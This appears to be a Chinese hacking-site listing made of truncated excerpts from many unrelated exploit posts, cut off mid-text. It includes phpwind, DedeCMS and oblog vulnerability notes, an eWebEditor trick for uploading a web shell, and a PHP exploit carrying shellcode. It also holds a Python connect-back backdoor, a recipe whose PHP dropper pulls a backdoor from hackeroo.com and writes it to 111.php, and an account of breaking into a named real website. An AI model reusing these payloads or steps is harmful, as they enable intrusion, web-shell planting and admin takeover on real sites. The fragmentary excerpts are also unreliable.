漏洞发布：http://www.80sec.com/ 漏洞作者：jianxin@80sec.com 漏洞厂商： http://www.phpwind.com/ 本漏洞影响phpwind所有版本 漏洞危害：高 漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作 利用方式：http://www.80sec.com有提供exploit 漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心...

author: superheiteam:http://www.ph4nt0m.orgblog:http://superhei.blogbus.com在用户登陆后把用户信息写如了缓存：\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty($mid)) $mid = $this->M_ID;$dsql = new DedeSql();$row = $dsql->GetOne(”Select ID,use...

1、任意文件下载漏洞.漏洞文件： ViewFile.aspFunction ChkFile(FileName) Dim Temp,FileType,F ChkFile=false FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,".")))) Temp="|asp|aspx|cgi|php|cdx|cer|asa|" If Instr(Temp,"|"&FileType"|")>0 Then ChkFile...

打开eWebEditorNet/upload.aspx，选择一个cer文件。再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。注意：此文章已发表在2007年12月<<黑客手册>>转载请著名出自雕牌'sblog52cmd.cn已经3个月的大学生活了，一直忙，所以没写文章了，星期天正好整理资料，朋友发来一网站喊帮忙入侵一下，正好闲着，就开始了入侵之路。一，初窥门径网站是http://www.lnwlw.com，程序是.net的。按一般的思路就是，先看有没注射，用啊D和明小子都检测...

[code]<?php if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} $scode = "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". "\x8c\xff\x26...

不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python# Python Connect-back Backdoor# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com># Version: 1.0# Date: July 15th 2006import sysimport osimport socketshell = "/bin/...

忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.  程序代码<?phpprint_r("+------------------------------------------------------------------+Exploit For Phpwind 5.X VersionBY  LoveshellJust For Fun :)+-----------------------------------------...

来源：Deepen Study漏洞文件：js.asp<%Dim oblogset oblog=new class_sysoblog.autoupdate=Falseoblog.startdim js_blogurl,njs_blogurl=Trim(oblog.CacheConfig(3))n=CInt(Request(”n”))if n=0 then n=1select case CInt(Request(”j”))case 1call tongji()case&nb...

作者：Kendy 文章来源：Kendy’s Blog unit Unit1; interface uses   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,   Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinD...

先注册个号，进入控制面版给自己发条短信  http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  这就是点```  用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为  =没有登陆````ef0020cf8c5e45b9 密码是这个```  下面就开始将管理员的密码更新为我注册用户的密码````  ...

PollVote是一个投票系统，今天看了非安全的杂志，看了利用方法， 不过作者说利用过程的时候很烦琐，关键的时候又没说明白， 简单的说一下`` 首先建立2个文本 分别是creatfile.txt和phpdoor.txt creatfile.txt内容写 <? $f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); $ff=fopen("111.php","a"); fwrit...